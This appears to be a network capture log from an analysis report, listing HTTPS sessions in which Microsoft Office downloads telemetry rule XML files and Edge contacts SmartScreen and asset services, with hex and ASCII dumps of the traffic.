2024-11-02 16:56:48 UTC	16384	IN	Data Raw: b6 07 8f 44 9d 29 36 4f 29 8a 7d 80 2e 1d 98 b7 c7 17 54 cd a1 2b c2 e9 29 21 98 f9 2e 1f 4a 0d ee 13 3f 5a 00 ff e7 0d f0 d4 1c 86 2e 21 27 d4 ff 4a 83 22 1e 86 3f 93 6b 62 a1 0e 2e 25 e1 37 a1 70 d4 f6 b3 17 bd e9 dd 8d 2a 44 2e 26 32 0d f4 82 4c f6 14 9e 97 92 23 fa 52 37 2e 2a 40 96 f4 4d 34 89 21 f2 49 39 e8 d3 d3 19 2e 2b ef 39 f1 8a 4a 7e 28 b9 d0 be 00 6f 35 68 2e 2e 95 d3 bd e3 e7 a0 d6 d0 25 5e 0d b7 b5 a5 2e 31 ce 53 a9 54 e0 3b 3c 2f fc 4d eb 0f a5 e1 2e 33 1e 46 e8 3a 01 30 91 17 49 f3 33 11 46 79 2e 36 b7 bb 07 e4 6d 92 d5 42 49 d7 e5 49 f4 85 2e 36 e8 96 57 36 97 bb 40 7a 3b ca 8a e0 7e 53 2e 3a 1e f2 97 75 d6 ae 4f f5 85 eb 36 38 65 e5 2e 3a 59 df c9 6e 75 92 ac 40 ac 59 a6 fd e4 1c 2e 3b 8e 5c 94 1d 75 39 54 06 13 6b 6e 7f ef 30 2e 43 e8 Data Ascii: D)6O)}.T+)!.J?Z.!'J"?kb.%7pD.&2L#R7.@M4!I9.+9J~(o5h..%^.1ST;</M.3F:0I3Fy.6mBII.6W6@z;~S.:uO68e.:Ynu@Y.;\u9Tkn0.C
2024-11-02 16:56:49 UTC	16384	IN	Data Raw: 02 f3 ca e4 05 cb a0 be 15 69 62 32 37 3c 37 3b db 81 8a b2 df cf ef b1 79 3f f8 ae 37 3d a3 01 e8 95 76 a1 63 78 77 2e 93 42 3d 4f 37 3e c4 08 a5 37 4f 84 43 dc 19 00 a9 8f 2e 0d 37 3f 82 55 cb cd 06 b9 0c 0d 94 f9 4f d6 82 e8 37 44 09 28 b8 33 ef b7 ee 6b 4c 90 ee e0 d1 3a 37 44 83 9a 56 2d 6a 58 ea 6b e5 8f 6a 1d 17 23 37 47 0f 55 f8 2b 1c 30 89 3a 1d e2 21 89 b7 42 37 4b 86 38 d0 cd 9f 96 62 d8 da bf d5 15 ed cb 37 4e 81 34 2b 0e ea ab 6f ae 29 15 59 32 ae 46 37 50 d2 0c 2a e2 ca 59 ec 21 86 70 f9 7a 6c d1 37 55 32 b2 91 f0 e7 b8 47 d0 f7 0f 64 90 d9 51 37 56 ce 44 24 61 58 d7 f8 d4 0d 8b fe 3d b0 27 37 58 1f 24 d2 a5 24 9c d7 5c 5a 71 f9 e9 f2 a3 37 58 9d d0 f0 06 3a 05 be 08 d9 90 bc 18 0d 71 37 5d 04 71 81 05 8e b6 9b 24 f2 54 35 1b 18 46 37 62 eb Data Ascii: ib27<7;y?7=vcxw.B=O7>7OC.7?UO7D(3kL:7DV-jXkj#7GU+0:!B7K8b7N4+o)Y2F7P*Y!pzl7U2GdQ7VD$aX='7X$$\Zq7X:q7]q$T5F7b
2024-11-02 16:56:49 UTC	16384	IN	Data Raw: 30 9b b9 2f 98 88 40 3b cc 98 d2 59 40 6d c4 d7 67 2a f1 8a f6 d5 d3 92 a9 c6 13 1d 40 71 5f 29 26 14 e2 86 f2 b1 3c d6 fc 07 07 4a 40 77 d4 86 06 be 80 6f b2 fd e4 19 fe 6b 6a 94 40 78 4d f5 b9 67 58 78 83 29 63 04 29 22 98 8d 40 7a 85 3f 10 18 78 19 d3 be 45 8d 0e 49 7b bb 40 7b 5d c5 55 97 e5 9d 35 9d 27 93 51 1d be 21 40 7d 42 88 f1 ca 9d ba 2a 28 3a f8 72 71 ba c7 40 7e 4d cf f4 13 b8 8f f1 9c e6 e4 a8 50 74 d0 40 80 bb 51 db 04 52 b7 b2 f3 5f dc db 6d 4b de 40 88 e2 91 a0 6c 67 8c d2 0b 9f d2 91 ca 6d 22 40 8a b9 d3 6a f9 07 64 05 ea 52 dc 44 82 0b 38 40 8b 54 ce 67 df 8c a3 48 2d 96 f6 ed e4 cf 78 40 8e 78 fd f9 d7 db ac 12 a0 80 27 db 9f 14 42 40 90 00 78 66 ff 66 2b 58 9f 18 13 aa 3d 6e b3 40 90 fa a1 0b 8e ee 2b 73 4b 59 c6 c9 b1 84 9b 40 93 53 Data Ascii: 0/@;Y@mg@q_)&<J@wokj@xMgXx)c)"@z?xEI{@{]U5'Q!@}B(:rq@~MPt@QR_mK@lgm"@jdRD8@TgH-x@x'B@xff+X=n@+sKY@S
2024-11-02 16:56:49 UTC	16384	IN	Data Raw: 66 82 7d 26 60 5e 84 ec 72 2a af 39 49 bb 12 c2 0a 6a 68 a1 f1 aa 3c 93 f9 79 13 0e 49 bb 81 dd 8c 7e 5d 19 6b 54 60 33 c1 1e 70 56 49 bc df 84 ed 14 a3 5d 07 06 25 84 6a 95 02 e0 49 bd eb 48 24 83 1e f1 e0 29 fe 9e e6 22 da 07 49 c1 2d 65 e8 79 f6 32 c8 9b 5b 3f 1a a8 9d b9 49 c4 33 af 97 7a e9 a1 ba ed 12 d0 a3 40 1e 42 49 c5 09 f1 9f 2c bb 61 75 14 cf 80 9c 0e 85 9e 49 c8 81 16 cb ae 60 54 25 eb 75 fe e4 b5 16 8c 49 cc 62 7c 10 80 46 f7 71 86 18 7b bd ea 45 5f 49 cd ad e9 e7 ee e9 a2 7e 24 2e 10 93 70 b0 ad 49 d1 bc ac 01 05 b1 9b be b4 f8 4e e6 0c 0d ac 49 d2 4b be 25 0a bd 70 d0 f7 10 c2 d7 38 8b f2 49 d4 c5 71 4c 7f 7a 2a 83 c3 c3 50 d2 c2 4c 3e 49 d5 40 eb ee b7 40 f4 16 fe b4 e7 35 d0 25 e3 49 d6 e7 89 68 04 ba a1 f5 37 3f 51 0a 5e cc 25 49 da b4 Data Ascii: f}&`^r9Ijh<yI~]kT`3pVI]%jIH$)"I-ey2[?I3z@BI,auI`T%uIb\|Fq{E_I~$.pINIK%p8IqLzPL>I@@5%Ih7?Q^%I

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.7	49890	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:48 UTC	192	OUT	GET /rules/rule701800v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:48 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:48 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT ETag: "0x8DC582BEA414B16" x-ms-request-id: 59bb3ce9-601e-0097-63c3-2bf33a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165648Z-16547b76f7fp6mhthC1DFWrggn0000000120000000007gra x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:48 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.7	49891	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:48 UTC	192	OUT	GET /rules/rule701050v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:48 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:48 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB256F43" x-ms-request-id: fadf1528-a01e-001e-72d2-2c49ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165648Z-15869dbbcc6ss7fxhC1DFWnrpc00000000rg000000009mdd x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:48 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.7	49892	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:48 UTC	192	OUT	GET /rules/rule701051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:48 UTC	517	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:48 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT ETag: "0x8DC582BE1CC18CD" x-ms-request-id: 4847cb37-401e-0016-7fd2-2c53e0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165648Z-16547b76f7fknvdnhC1DFWxnys00000000yg00000000b8pr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:48 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.7	49893	13.91.222.61	443	7568	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:48 UTC	723	OUT	POST /api/browser/edge/data/bloomfilter/x/3 HTTP/1.1 Host: data-edge.smartscreen.microsoft.com Connection: keep-alive Content-Length: 746 Accept: application/octet-stream;application/x-patch-bsdiff; Authorization: SmartScreenHash eyJhdXRoSWQiOiI0MWE0MzhiYy0xMjQ5LTQzZDMtYTI2ZC02OWNkNjJjMDgzMTciLCAia2V5IjoiSnNjY3FTVTBZQnFFeDd6ZkdBSEJuQT09IiwgImhhc2giOiJlMTlBR0ZGa1hicz0ifQ== Content-Type: application/json; charset=utf-8 If-None-Match: "636976985063396749.rel.v2" Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br
2024-11-02 16:56:48 UTC	746	OUT	Data Raw: 7b 22 69 64 65 6e 74 69 74 79 22 3a 7b 22 75 73 65 72 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 7d 2c 22 64 65 76 69 63 65 22 3a 7b 22 69 64 22 3a 6e 75 6c 6c 2c 22 63 75 73 74 6f 6d 49 64 22 3a 6e 75 6c 6c 2c 22 6f 6e 6c 69 6e 65 49 64 54 69 63 6b 65 74 22 3a 6e 75 6c 6c 2c 22 66 61 6d 69 6c 79 22 3a 33 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 2c 22 6f 73 56 65 72 73 69 6f 6e 22 3a 22 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 2e 76 62 5f 72 65 6c 65 61 73 65 22 2c 22 62 72 6f 77 73 65 72 22 3a 7b 22 69 6e 74 65 72 6e 65 74 5f 65 78 70 6c 6f 72 65 72 22 3a 22 39 2e 31 31 2e 31 39 30 34 31 2e 30 22 7d 2c 22 6e 65 74 4a 6f 69 6e 53 74 61 74 75 73 22 3a 32 2c 22 65 6e 74 65 72 70 72 69 73 65 22 3a 7b 7d 2c 22 63 6c 6f 75 64 53 6b Data Ascii: {"identity":{"user":{"locale":"en-GB"},"device":{"id":null,"customId":null,"onlineIdTicket":null,"family":3,"locale":"en-GB","osVersion":"10.0.19045.2006.vb_release","browser":{"internet_explorer":"9.11.19041.0"},"netJoinStatus":2,"enterprise":{},"cloudSk
2024-11-02 16:56:49 UTC	248	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:48 GMT Content-Type: application/octet-stream Content-Length: 57 Connection: close Server: Kestrel ETag: "638343870221005468" Request-Context: appId=cid-v1:3d5e3eff-de07-43c3-a15d-06b05ff513c8
2024-11-02 16:56:49 UTC	57	IN	Data Raw: 39 00 00 00 0a 00 00 00 6d 75 72 6d 75 72 33 00 0d 00 00 00 e7 00 00 00 0c 00 00 00 2c 4d f0 68 e4 05 e3 5a 14 87 bb 38 10 5c e2 c4 94 3c 26 4c 69 f1 48 99 f4 5b b2 3f 6d Data Ascii: 9murmur3,MhZ8\<&LiH[?m

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
139	192.168.2.7	49894	13.107.246.57	443	7568	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:49 UTC	711	OUT	GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Edge-Asset-Group: EntityExtractionDomainsConfig Sec-Mesh-Client-Edge-Version: 117.0.2045.47 Sec-Mesh-Client-Edge-Channel: stable Sec-Mesh-Client-OS: Windows Sec-Mesh-Client-OS-Version: 10.0.19045 Sec-Mesh-Client-Arch: x86_64 Sec-Mesh-Client-WebView: 0 Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-02 16:56:49 UTC	583	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:49 GMT Content-Type: application/octet-stream Content-Length: 70207 Connection: close Content-Encoding: gzip Last-Modified: Thu, 24 Oct 2024 19:29:56 GMT ETag: 0x8DCF4623DD70062 x-ms-request-id: 357ef44a-601e-005e-0172-2c9b04000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241102T165649Z-15869dbbcc6j87jfhC1DFWky3s00000000ng0000000093m1 Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-11-02 16:56:49 UTC	15801	IN	Data Raw: 1f 8b 08 08 34 a0 1a 67 02 ff 61 73 73 65 74 00 ec bd 0b 97 db 36 b2 30 f8 57 b2 b9 33 b3 dd 89 d5 d6 5b dd d9 cd fa f4 d3 f1 f8 39 6d 3b 19 db f1 d5 01 49 48 a2 45 91 0c 1f 6a ab c3 be bf 7d 0b 05 80 00 08 50 52 db ce 77 ef b7 67 67 9c 16 09 14 0a 40 a1 50 a8 2a 14 c0 3f bf f7 93 78 16 ce bf ff e9 bb 3f bf 2f 92 25 8d a7 51 b8 0a 0b 78 ef 8d bb dd 07 df 7d 9f 92 39 9d fa 65 91 cc 66 90 38 1c f4 59 62 40 67 a4 8c 8a 69 94 f8 24 a2 d3 15 49 11 81 c7 f0 c0 df 0e 3c 00 94 97 e3 6b de f1 08 7b a5 11 7b a5 51 67 9e e1 6b 8c af 71 a7 cc f1 15 81 69 de 59 7d c6 d7 02 5f 8b 0e a5 ec d5 c7 5c 3f ef f8 b7 ec 35 20 ec 35 20 9d 60 89 af 14 5f 69 27 40 e0 19 e6 ce 48 27 c4 8a 66 21 be 86 1d 78 60 af 19 be 66 9d 19 e6 2e b0 ec 82 76 c2 08 5f 31 77 91 75 16 3c b7 c4 d7 Data Ascii: 4gasset60W3[9m;IHEj}PRwgg@P*?x?/%Qx}9ef8Yb@gi$I<k{{QgkqiY}_\?5 5 `_i'@H'f!x`f.v_1wu<
2024-11-02 16:56:49 UTC	16384	IN	Data Raw: 4a b0 09 cb 82 45 ac c5 f3 e8 07 bb 82 71 ba da 2a 0b c7 62 2c 30 96 c2 52 09 74 65 c0 2a 8a c3 88 95 9c 7c 3e a9 79 09 d4 fa 9a 9f 30 4a 49 28 2b d7 97 ff 7a 7b f9 fa cd f4 c9 05 68 2b 37 9c c1 08 01 cb 2f 28 f3 02 34 de 08 0c a6 34 da 38 c6 ec 48 27 33 28 96 9f 45 d9 4f 9f 12 f7 54 d2 47 a6 39 87 08 81 e9 6d 4f c1 43 97 10 bf ad 59 55 67 39 13 fe 1e 05 67 65 16 87 6c 9b f5 cb 90 60 eb 3d ea 25 09 33 8b f9 4a fb 10 ef 11 3b 7c e8 61 60 14 a0 60 b9 7c 16 e7 69 54 b1 c3 22 c0 e0 29 df c2 05 4c 8f bc f0 67 5e 04 75 33 51 9a b7 e1 61 1a 61 48 f5 c3 30 f7 62 91 d5 a8 34 39 2a 97 ff 2d f5 aa c1 c2 6c 78 e0 35 33 d1 42 b3 75 c4 be 3b f4 d0 68 83 51 a7 81 2d a0 ff 0d 5d 10 62 ed 7f 55 a5 99 9f 25 2b 2f a4 4d 09 21 65 43 c7 04 cf 93 19 f3 c1 d0 b6 e9 14 38 59 31 Data Ascii: JEqb,0Rte\|>y0JI(+z{h+7/(448H'3(EOTG9mOCYUg9gel`=%3J;\|a``\|iT")Lg^u3QaaH0b49*-lx53Bu;hQ-]bU%+/M!eC8Y1
2024-11-02 16:56:49 UTC	16384	IN	Data Raw: 2f 4d 35 19 b9 3f d5 c1 f4 52 a7 67 b3 99 ff bc b7 c2 8e 7c d3 4d 9a a5 bf dc f0 20 15 b1 bc 1f 82 9a 8d 98 a7 af db 80 6b 74 e7 ab 7c e6 18 7d 9a 2b 3e 34 2d 1a e7 c0 d5 e8 b4 a0 0e d4 7d 19 bb 69 52 58 a2 33 32 78 db 4b 2d cd 54 dd d2 2b 9c a0 29 69 1a ba 4a ee 0a 4d 33 5a 7b a7 1a 83 5f f3 f7 fe 2c 2f 84 3b 39 d0 56 82 ef 75 a4 f3 69 57 af 58 09 8c 2a 1d 24 b9 4e 6b cf 63 d0 74 99 e3 02 0f 26 7f 1a 86 a9 a8 69 fa 5a d8 25 83 c1 ea f8 fd 12 62 16 86 38 17 5a 19 6f 13 03 00 e6 6a 07 a4 40 be bb 20 de a6 de bf d1 06 75 32 1f c3 4f 67 41 ad 31 bd b0 9c ee 44 47 33 2a 92 9c d3 f6 35 64 a9 b1 d3 f6 b1 c7 a7 b4 80 af ea c1 2a 6c dd 81 a0 0b 67 ca d2 b2 11 7c 8d dc 39 47 56 d1 bd 08 e8 ec 3e 4f c9 56 d6 7a d3 9a 56 4d 17 50 41 9b 17 9b 37 36 da 2e 7c a4 ba 63 Data Ascii: /M5?Rg\|M kt\|}+>4-}iRX32xK-T+)iJM3Z{_,/;9VuiWX$Nkct&iZ%b8Zoj@ u2OgA1DG35d*lg\|9GV>OVzVMPA76.\|c
2024-11-02 16:56:49 UTC	16384	IN	Data Raw: 99 dc 5a 2e 69 cf 52 41 9e 48 c8 71 d7 39 94 dd f7 b6 3f 2a 48 d1 b5 2e 37 a4 97 5f 43 54 c9 8d d7 76 7a 14 e4 6f 3b 80 f7 6a 61 e8 6f 47 e9 2d cb 60 84 66 2b c0 b9 77 09 1b c0 32 5c aa 6c 0e 25 81 ed a0 5e 61 25 37 6f 3c a5 bc 1f 04 1a dd b1 04 1d c9 73 16 3a 58 a8 69 4d 12 c1 5e e9 66 5f 14 6c e4 9e d4 61 25 e1 2f c3 fc b8 ed df 80 5d 2b 3a 5b 4c 56 c9 72 1f 59 1d 6a 72 0b d2 b0 4c 8e d5 67 db 16 79 41 90 65 4f 4b 68 63 f6 d1 e5 db b6 6a 18 e6 ca 5f 04 79 2e 71 69 5d 0e 19 cc d9 f6 58 27 58 af 1c 18 04 f1 98 d2 bf 15 1e 37 ce e0 1e 88 54 83 3c 82 f8 a8 05 5f b0 1b 3f 2f 02 8f 31 a4 e9 1d ed 45 e6 e4 85 e6 b9 66 4c fd cd 8d e4 58 f7 79 73 8b 47 40 25 b6 0d 7f 78 ff a8 fe e7 7d 69 4a fc 00 c7 b0 37 a9 44 f0 40 1e e8 bd 41 8a b4 0a 5d 5a 2c 0e 60 f7 fb 81 Data Ascii: Z.iRAHq9?*H.7_CTvzo;jaoG-`f+w2\l%^a%7o<s:XiM^f_la%/]+:[LVrYjrLgyAeOKhcj_y.qi]X'X7T<_?/1EfLXysG@%x}iJ7D@A]Z,`
2024-11-02 16:56:49 UTC	5254	IN	Data Raw: 29 50 5f 50 34 9a d3 9a 2a 83 ab 27 93 58 c5 2b d2 9c af 2b 4e 0f 79 ac a9 56 57 20 b1 61 ca d2 f5 ed 38 df 10 b9 60 88 4c 48 ac b1 cd 10 b5 8f 76 49 19 f2 b6 d5 54 1d d1 9c b1 20 7a d3 64 f7 91 a2 0c 4d 73 6d e0 da be ee e6 87 03 9f 5e f7 4f 98 9c 12 cd 88 68 4c 2e b1 48 00 60 c3 31 74 31 8d 87 b4 32 56 02 4f bf e1 a9 3b c0 40 d6 24 8e 10 55 c7 c3 e7 8c f3 78 28 78 d3 94 de b0 5a 4d 22 eb 28 5c 22 00 98 8e 15 1a f8 ab ac 54 f4 5d 80 d0 a5 aa 6e 87 83 fd d6 f1 b0 c0 82 f7 f4 5e ef 2f 2b b8 62 a2 13 a1 4d ae 60 cf 59 3c b1 b1 f4 40 4d 41 74 7c ac 2c 5a 9e ef f4 d2 81 6d 69 e1 d3 8b 73 2c 84 2c 06 37 fd 72 38 10 a5 b2 13 51 f1 a0 a2 06 7d 3f 89 8f 72 35 a0 58 a0 46 79 2f b7 1f cc 57 92 ec c8 b4 b5 f2 5c 65 e7 30 5a 93 e3 b1 8e 5f f5 91 44 87 44 19 1d 59 83 Data Ascii: )P_P4*'X++NyVW a8`LHvIT zdMsm^OhL.H`1t12VO;@$Ux(xZM"(\"T]n^/+bM`Y<@MAt\|,Zmis,,7r8Q}?r5XFy/W\e0Z_DDY

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.7	49895	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:49 UTC	192	OUT	GET /rules/rule702751v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:49 UTC	517	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:49 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB866CDB" x-ms-request-id: 1deecc73-401e-0029-32d2-2c9b43000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165649Z-16547b76f7f76p6chC1DFWctqw00000000xg00000000kwbp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:49 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.7	49896	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:49 UTC	192	OUT	GET /rules/rule702750v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
